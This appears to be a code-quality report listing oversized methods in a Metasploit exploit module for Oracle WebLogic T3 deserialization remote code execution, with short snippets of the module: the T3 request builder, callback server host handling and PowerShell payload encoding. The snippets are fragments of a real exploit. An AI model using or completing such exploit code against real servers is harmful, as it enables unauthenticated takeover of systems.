modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
File weblogic_deserialize_unicastref.rb has 558 lines of code (exceeds 250 allowed). Consider refactoring.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::TcpServer
Method build_t3_request_object has 199 lines of code (exceeds 25 allowed). Consider refactoring.
def build_t3_request_object
  # T3 request serialized data
  # retrieved by watching network traffic
  # This is a proprietary, undocumented protocol
  data = '000005c3' # length of the packet
Method send_payload_objdata has 130 lines of code (exceeds 25 allowed). Consider refactoring.
def send_payload_objdata
  shost = srvhost
  if ['0.0.0.0', '127.0.0.1', '::'].include?(shost)
    shost = Rex::Socket.source_address
  end
Method gen_resp has 86 lines of code (exceeds 25 allowed). Consider refactoring.
def gen_resp
  if target.name == 'Windows'
    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
    mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
  elsif target.name == 'Unix' || target.name == 'Solaris'
Method initialize has 59 lines of code (exceeds 25 allowed). Consider refactoring.
def initialize(info={})
  super(update_info(info,
    'Name' => 'Oracle Weblogic Server Deserialization RCE - RMI UnicastRef',
    'Description' => %q{
      An unauthenticated attacker with network access to the Oracle Weblogic Server T3